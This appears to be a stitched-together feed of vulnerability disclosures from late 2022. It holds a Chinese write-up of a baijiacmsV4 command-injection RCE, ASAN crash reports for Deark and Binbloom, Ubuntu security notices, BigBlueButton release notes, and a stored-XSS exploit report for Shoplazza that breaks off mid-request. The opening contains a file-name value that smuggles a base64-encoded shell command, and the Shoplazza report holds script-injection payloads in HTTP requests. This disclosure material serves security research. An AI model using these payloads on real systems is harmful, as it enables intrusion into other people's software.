convert -quality 100 /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash; /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

由于代码中会根据后缀建立文件夹，所以在system中，payload一共会执行四次，也就是为什么在执行whoami这个payload是，会输出4个www。

**nothing**

1.  在写测试的命令时，如果要用到ping dnslog这类命令，由于linux默认是会一直ping下去的。所以最好加一个-c 4限制次数（系统被搞崩了好多次）
    
2.  php中单引号的字符串和双引号的字符串差距还是挺大的。https://www.cnblogs.com/youxin/archive/2012/02/13/2348551.html。因为这个特性，测试的时候被卡了好久

CVE-2022-45942: baijiacmsV4 后台RCE | This_is_Y

Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c.

**Description**

A stack-buffer-overflow bug was discovered in function do\_prism\_read\_palette modules/atari-img.c:331

**Version**

Version v1.6.2 (Lastest commit)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce**

Command

    git clone the Lastest Version firstly.
    make && make install
    ./deark -l -zip ./poc
    

POC file at the bottom of this report.

**ASAN Report**

    Module: prismpaint
    =================================================================
    ==20784==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc6490a820 at pc 0x55eae0de20ff bp 0x7ffc6490a390 sp 0x7ffc6490a380
    READ of size 4 at 0x7ffc6490a820 thread T0
        #0 0x55eae0de20fe in do_prism_read_palette modules/atari-img.c:331
        #1 0x55eae0de247e in de_run_prismpaint modules/atari-img.c:361
        #2 0x55eae0fd7023 in de_run_module src/deark-util.c:878
        #3 0x55eae0fd7023 in de_run_module src/deark-util.c:843
        #4 0x55eae1036a35 in de_run src/deark-user.c:452
        #5 0x55eae0dc39e9 in main2 src/deark-cmd.c:988
        #6 0x55eae0dc39e9 in main src/deark-cmd.c:1022
        #7 0x7fd587ac4082 in __libc_start_main ../csu/libc-start.c:308
        #8 0x55eae0dc652d in _start (/AFLplusplus/my_test/deark/backup/asan/deark-master/deark+0xf652d)
    
    Address 0x7ffc6490a820 is located in stack of thread T0 at offset 1056 in frame
        #0 0x55eae0de1c7f in do_prism_read_palette modules/atari-img.c:304
    
      This frame has 2 object(s):
        [32, 1056) 'pal1' (line 308) <== Memory access at offset 1056 overflows this variable
        [1184, 1216) 'tmps' (line 310)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow modules/atari-img.c:331 in do_prism_read_palette
    Shadow bytes around the buggy address:
      0x10000c9194b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c9194f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x10000c919500: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x10000c919510: f2 f2 f2 f2 00 00 00 00 f3 f3 f3 f3 00 00 00 00
      0x10000c919520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10000c919550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    
    

**POC**

id\_000027,sig\_11,src\_013544+002505,time\_31840218,execs\_68965869,op\_splice,rep\_16.zip

Any issue plz contact with me:  
asteriska001@gmail.com  
OR:  
twitter: @Asteriska8

CVE-2022-43289: A stack-buffer-overflow bug was discovered. · Issue #52 · jsummers/deark

Ubuntu Security Notice 5783-1 - Tamás Koczka discovered that the Bluetooth L2CAP handshake implementation in the Linux kernel contained multiple use-after-free vulnerabilities. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5783-1December 16, 2022linux-oem-5.17 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash or run programs as an administrator.Software Description:- linux-oem-5.17: Linux kernel for OEM systemsDetails:Tamás Koczka discovered that the Bluetooth L2CAP handshake implementationin the Linux kernel contained multiple use-after-free vulnerabilities. Aphysically proximate attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.17.0-1025-oem     5.17.0-1025.26   linux-image-oem-22.04           5.17.0.1025.23   linux-image-oem-22.04a          5.17.0.1025.23After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5783-1   CVE-2022-42896Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1025.26

Ubuntu Security Notice USN-5783-1

BigBlueButton is an open source web conferencing system. Versions prior to 2.4.3, are subject to Insufficient Verification of Data Authenticity, resulting in Denial of Service. An attacker can make a Meteor call to `validateAuthToken` using a victim's userId, meetingId, and an invalid authToken. This forces the victim to leave the conference, because the resulting verification failure is also observed and handled by the victim's client. The attacker must be a participant in any meeting on the server. This issue is patched in version 2.4.3. There are no workarounds.

This is the first release of BigBlueButton 2.5 and includes numerous new features and updates to existing ones.  
Note that it runs on Ubuntu Bionic (18.04) and HTML5 client runs on Node 16.

BigBlueButton 2.5-dev is under active development. While we don’t recommend setting it up in a production environment, we do encourage administrators to try out the build with others and give us feedback on our bigbluebutton-dev mailing list.

Link to installation command / instructions/ schedule / planned features : https://docs.bigbluebutton.org/2.5/new.html

All fixes from BigBlueButton 2.4.x are here up to and including v2.4.4.

Big THANK YOU to all comminuty members who helped for this release - both through sending pull requests and through reporting bugs or requesting enhancements! 🎊

**HTML5 client**

newly introduced

*   feat: Activate waiting room permanently #13156 Thanks @PhMemmel
*   feat(audio): add bridge configurable scheme #13266
*   feat: Allow non-mod presenters to see raised hands dialog and lower raised hands #13300 Thanks @PhMemmel
*   feat(wb): Fill shape in whiteboard #10737 Thanks @hiroshisuga
*   feat(accessibility): Add Promoted / Demoted Toast Notification #14050
*   feat(polling): multiple choice poll #13253 Thanks @simonhir @mzinsmeister and @ramonlsouza !
*   feat: (Optional) Showing BBB version in About modal #14281

fixes

*   fix: Fix typo: "Unset" -> "Unsent" #13684 Thanks @hiroshisuga
*   fix: typo in raise-hand button styles #13579
*   fix: Fix wrong annotation codes #13674 Thanks @hiroshisuga
*   fix: Client crashes when trying to remove a user #13735
*   fix: Polling panel to remember "Work In Progress" polls #13754
*   fix: typing indicator names position (2.5) #13859
*   fix: Improved HD stretch of virtual background #13855 Thanks @drlight17
*   fix: Fix typo in validate authtoken method #14044
*   fix(video preview): bad alignment #14043
*   fix: mute + listen only icons in userlist #14161
*   fix: restore missing variable #14174
*   fix: close sidebar panel for non-presenters #14175
*   fix: screenshare position regression #14212

refactor

*   !removal: Dropping support for iframe postMessage API #13778
*   refactor: styled-components conversion #13603 #13608 #13623 #13648 #13645 #13680 #13577 #13591 actions bar #13566 userlist #13544
*   refactor: Styled-components CSS variables #13701 #13713
*   refactor: Add use-context-selector to layoutContext #13186
*   refactor: Implements CollectionEventsBroker for chat context - develop #13261
*   refactor: Add server side reactivity to publications #13174
*   refactor: reduce complexity and remove duplicated code from layouts #13277
*   refactor: Improve message when hand has been lowered #13301
*   refactor: Client authentication #13601
*   refactor: isPresenter rework #13745
*   refactor: connection status UX #13518
*   update(audio): do not check for chrome in iOS devices in audio modal #13562
*   refactor: Create custom cursor for current poll and user #13404
*   update: allow users in iOS join from chrome mobile version 94+ #13635
*   refactor: Random user ordering #13630
*   refactor: remove unused imports/exports #13705
*   refactor: add flexbox to avoid HTML changes #13551
*   refactor: Improve data structure to not break on reconnections #13574
*   refactor: Remove unnecessary clippath from textarea annotation on Firefox #13728 Thanks @hiroshisuga
*   refactor: remove unused imports/variables #14186
*   refactor: create 'common' folder for all reusable components #14367

other

*   chore(webrtc): let the server generate subscriber offers by default #13254
*   chore(bbb-html5): enable camera pin/screenshare volume control by default #14093
*   style: Center modal title #13739 Thanks @Buda9 and @ramonlsouza
*   style: Increase create breakout room users list height #14343

**build (packaging scripts)**

**new** BigBlueButton 2.5 is packaged using the open source packaging scripts located in https://github.com/bigbluebutton/bigbluebutton/tree/v2.5.x-release/build. Big THANK YOU to the community members who heavily contributed for this change: @zfgrnzfsberire @schrd @danimo @BrentBaccala @basisbit , see #12993

Additional changes to build/packaging:

*   build: switch bbb-freeswitch-core to build from master; cleanup #13509
*   build: Recovering bbb-freeswitch-core build on 2.5+ #13508
*   use placeholder files during change detection #13500 Thanks @zfgrnzfsberire
*   Instruct FreeSWITCH to announce external IP in SDP #11846 Thanks @znerol
*   build: Improve freeswitch build #13594 Thanks @BrentBaccala
*   build: Specify meteor version before building #13343
*   build: Rely on meteor version from docker image #13352
*   build: Remove node-sass rebuild (not needed for node 14) #13332
*   build: Added auto restart of bbb-html5-backend and frontend on failure #13527
*   build: Set worker\_rlimit\_nofile only once in nginx.conf #13248 Thanks @Nudin
*   build: html5 nodejs version + cleanup #13632
*   build (typo): occurs here and front install page #13303 Thanks @carehart
*   build: Update the Maintainer field for bigblutbutton #13742
*   build(etherpad): bump v1.8.16 #13939
*   fix(build): missing bbb-pads #14216
*   chore: webrtc-sfu@v2.7.0-alpha.1 (full audio + mediasoup) #14218
*   build(bbb-pads): bump v1.0.2 #14345
*   fix(FS): Allow patch with different whitespace #14370
*   build: bump bbb-webrtc-sfu to 2.7.0-alpha.8 #14371
*   build: Node 16 for SFU, NPM 8.4.1, image tag update for BBB 2.5 #14307
*   build: Disable login for freeswitch and meteor users #14387
*   build: Set bbb-html5 client built in settings.yml #14391
*   build: Automatically set bbbServerVersion in settings.yml #14393
*   build: change StartLimitAction to none in bbb-html5 services #14392
*   fix: Force update of common-message and common-web libs #14389

**General**

*   docs: Replace dead links #13727 Thanks @daholzfeind
*   docs: Update SECURITY.md for 2.4 #13951

**Learning Analytics Dashboard**

*   feat: Added Timeline and improved UX of Dashboard #13626
*   feat: Provide Presentation info to Learning Dashboard #13708
*   feat: Dashboard support for multiple choices polls #13861
*   refactor: Merge Dashboard improvements from 2.4 to Develop #13926
*   refactor(Dashboard): add support for users grouped by extdId #13930
*   feature (Dashboard): add the UI for presentation slides #13862
*   style(dashboard): Several small visual fixes needed after conflicts #14117
*   fix(Dashboard): average activity score #14128

**Core**

*   feat: multiple choice poll #13253 Thanks @simonhir @mzinsmeister and @ramonlsouza !
*   feat(guest lobby): Add private guest lobby messages #14067 Thanks @SashoVihVas
*   feat(guest lobby): Add position in waiting queue for guest users #14063 Thanks @SashoVihVas
*   feat: Auto assign Breakouts (names and users) using previous rooms info or groups info #13678
*   feat(api): Created endpoint to insert file into presentation. #14264
*   feat(api): new api Create param: disabledFeatures #14293
*   refactor: Remove unused properties from chat message event #13564
*   fix: Breakouts assignments are ignored when freeJoin is true #13816
*   fix: Fix annotation order for pen drawings #12249 Thanks @hiroshisuga
*   fix(bbb-web) broken Asian filename for pre-uploaded presentation (fix on bbb-web) #14134 Thanks @hiroshisuga
*   fix: Clear cache before publish common-message and common-web #14346 #14377 #14389
*   fix: Change format of number values in getMeetingInfo #14348

**bigbluebutton-config**

*   refactor: Obsolete file check-localization-keys.txt #14048

**recording**

*   fix(recording): support recordings with no fill attribute #13918
*   fix(recording): Updated usage section of analytics script to match actual syntax #11805 Thanks @sebastianberm
*   fix(recording): not processed screenshare #14019 Thanks @jgribonvald
*   refactor(recording): Prevent unnecessary file copying in presentation recording processing #13697 Thanks @danielpetri1
*   bbb-record: refactoring, more config checks, list-workflows option #14022

**bbb-libreoffice**

*   fix(bbb-libreoffice): Improve permissions for etc sudoers for bbb-libreoffice #13183 Thanks @test-erik
*   fix: Use the config officeToPdfConversionTimeout in the Office conversion Docker #14368

**bbb-etherpad and bbb-pads**

Major refactor was done by @pedrobmarin to extract access control etc out of bbb-html5 into a new NodeJS application bbb-pads https://github.com/bigbluebutton/bbb-pads

*   refactor(etherpad): access control et al. #13916
*   feat(pads): add pads to bbb-conf #14196
*   fix(pads): add double quotes to APIKEY #14197
*   fix(config): correct path for bbb-pads.service #14200

**bbb-webhooks**

bbb-webhooks was extracted out of BigBlueButton's main repository into a separate one, still under the same organization https://github.com/bigbluebutton/bbb-webhooks

*   refactor!(webhooks): remove from main repository #12535 bbb-webhooks is now located at https://github.com/bigbluebutton/bbb-webhooks

**Release name**

In case an administrator does not want to update to the latest bionic-250 version. Use as substitute to the -v argument in bbb-install.sh command  
bionic-250-2.5-alpha-1  
We still recommend using -v bionic-250.

**Client build: 40**

CVE-2022-41960: Release BigBlueButton 2.5-alpha-1 · bigbluebutton/bigbluebutton

Binbloom 2.0 was discovered to contain a heap buffer overflow via the read_pointer function at /binbloom-master/src/helpers.c.

**Description**

Some crashes occurred in function read\_pointer at binbloom-master/src/helpers.c:67:24 when running program binbloom, this can reproduce on the latest commit.

**Version**

Binbloom 2.0 latest commithttps://github.com/quarkslab/binbloom/commit/b9aada98fa98924d7d3d90e638e865df9f9a2e53 Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86\_64 x86\_64 x86\_64 GNU/Linux

**Command**

./binbloom ./POC

**Crashe**

\==487329==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010f90 at pc 0x0000004d3963 bp 0x7ffece9f22d0 sp 0x7ffece9f22c8 READ of size 4 at 0x631000010f90 thread T0 #0 0x4d3962 in read\_pointer /home/hjsz/fuzz\_software/binbloom-master/src/helpers.c:67:24 #1 0x4cc0e5 in compute\_candidates /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:1134:21 #2 0x4d0131 in find\_base\_address /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c #3 0x4d2127 in main /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:2102:17 #4 0x7f9ffd152082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c3ed in \_start (/home/hjsz/fuzz\_software/binbloom-master/src/binbloom+0x41c3ed)

0x631000010f91 is located 0 bytes to the right of 67473-byte region \[0x631000000800,0x631000010f91) allocated by thread T0 here: #0 0x494b2d in malloc (/home/hjsz/fuzz\_software/binbloom-master/src/binbloom+0x494b2d) #1 0x4cfd95 in find\_base\_address /home/hjsz/fuzz\_software/binbloom-master/src/binbloom.c:1655:39 #2 0x7f9ffd152082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hjsz/fuzz\_software/binbloom-master/src/helpers.c:67:24 in read\_pointer Shadow bytes around the buggy address: 0x0c627fffa1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c627fffa1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c627fffa1f0: 00 00\[01\]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c627fffa240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==487329==ABORTING

**Crashes and POC**

POC.zip Crashes.zip

CVE-2022-44910: CVE/Reference of Binbloom.md at main · yangfar/CVE

Ubuntu Security Notice 5778-1 - Jan-Niklas Sohn discovered that X.Org X Server extensions contained multiple security issues. An attacker could possibly use these issues to cause the X Server to crash, execute arbitrary code, or escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-5778-1December 14, 2022xorg-server, xorg-server-hwe-18.04, xwayland vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in X.Org X Server.Software Description:- xorg-server: X.Org X11 server- xwayland: X server for running X clients under Wayland- xorg-server-hwe-18.04: X.Org X11 serverDetails:Jan-Niklas Sohn discovered that X.Org X Server extensions containedmultiple security issues. An attacker could possibly use these issues tocause the X Server to crash, execute arbitrary code, or escalateprivileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   xserver-xorg-core               2:21.1.4-2ubuntu1.3   xwayland                        2:22.1.3-2ubuntu0.2Ubuntu 22.04 LTS:   xserver-xorg-core               2:21.1.3-2ubuntu2.5   xwayland                        2:22.1.1-1ubuntu0.4Ubuntu 20.04 LTS:   xserver-xorg-core               2:1.20.13-1ubuntu1~20.04.5   xwayland                        2:1.20.13-1ubuntu1~20.04.5Ubuntu 18.04 LTS:   xserver-xorg-core               2:1.19.6-1ubuntu4.13   xserver-xorg-core-hwe-18.04     2:1.20.8-2ubuntu2.2~18.04.9   xwayland                        2:1.19.6-1ubuntu4.13   xwayland-hwe-18.04              2:1.20.8-2ubuntu2.2~18.04.9After a standard system update you need to reboot your computer to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-5778-1   CVE-2022-4283, CVE-2022-46340, CVE-2022-46341, CVE-2022-46342,   CVE-2022-46343, CVE-2022-46344Package Information:   https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.4-2ubuntu1.3   https://launchpad.net/ubuntu/+source/xwayland/2:22.1.3-2ubuntu0.2   https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.3-2ubuntu2.5   https://launchpad.net/ubuntu/+source/xwayland/2:22.1.1-1ubuntu0.4   https://launchpad.net/ubuntu/+source/xorg-server/2:1.20.13-1ubuntu1~20.04.5   https://launchpad.net/ubuntu/+source/xorg-server/2:1.19.6-1ubuntu4.13 https://launchpad.net/ubuntu/+source/xorg-server-hwe-18.04/2:1.20.8-2ubuntu2.2~18.04.9

Ubuntu Security Notice USN-5778-1

Ubuntu Security Notice 5777-1 - It was discovered that Pillow incorrectly handled the deletion of temporary files when using a temporary directory that contains spaces. An attacker could possibly use this issue to delete arbitrary files. This issue only affected Ubuntu 20.04 LTS. It was discovered that Pillow incorrectly handled the decompression of highly compressed GIF data. An attacker could possibly use this issue to cause Pillow to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5777-1  
December 13, 2022

pillow vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Pillow.

Software Description:  
- pillow: Python Imaging Library

Details:

It was discovered that Pillow incorrectly handled the deletion of temporary  
files when using a temporary directory that contains spaces. An attacker   
could  
possibly use this issue to delete arbitrary files. This issue only affected  
Ubuntu 20.04 LTS. (CVE-2022-24303)

It was discovered that Pillow incorrectly handled the decompression of   
highly  
compressed GIF data. An attacker could possibly use this issue to cause   
Pillow  
to crash, resulting in a denial of service. (CVE-2022-45198)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   python3-pil                     9.0.1-1ubuntu0.1

Ubuntu 20.04 LTS:  
   python3-pil                     7.0.0-4ubuntu0.7

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5777-1  
   CVE-2022-24303, CVE-2022-45198

Package Information:  
   https://launchpad.net/ubuntu/+source/pillow/9.0.1-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/pillow/7.0.0-4ubuntu0.7

Ubuntu Security Notice USN-5777-1

Shoplazza version 1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting# Exploit Author: Andrey Stoykov# Software Link: https://github.com/Shoplazza/LifeStyle# Version: 1.1# Tested on: Ubuntu 20.04Stored XSS #1:To reproduce do the following:1. Login as normal user account2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]// HTTP GET request to trigger XSS payloadGET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8[...]<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><title>Title"><script>alert(1)</script></title><meta name="keywords" content="test1205">[...]Stored XSS #2:To reproduce do the following:1. Login as normal user account2. Browse "Products" -> "Create Product"3. Select "Subtitle" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPOST /admin/api/admin/v2_products HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections[...]Stored XSS #3:To reproduce do the following:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"3. Select "Text" section and enter payload "><script>alert(1)</script>4. Select "Mobile Text" section and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0// HTTP response showing unsanitized XSS payload{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]Stored XSS #4:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" 3. Select "Subheading" and enter payload "><script>alert(1)</script>3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Select "Button Text" and enter payload "><script>alert(1)</script>6. Select "Label" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"[...]Stored XSS #5:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" 3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Description" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script>[...]Stored XSS #6:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"6. Select "Heading" and enter payload "><script>alert(1)</script>7. Select "Text" and enter payload "><script>alert(1)</script>8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"9. Select "Heading" and enter payload "><script>alert(1)</script>10. Select "Text" and enter payload "><script>alert(1)</script>11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"12. Select "Heading" and enter payload "><script>alert(1)</script>13. Select "Text" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with 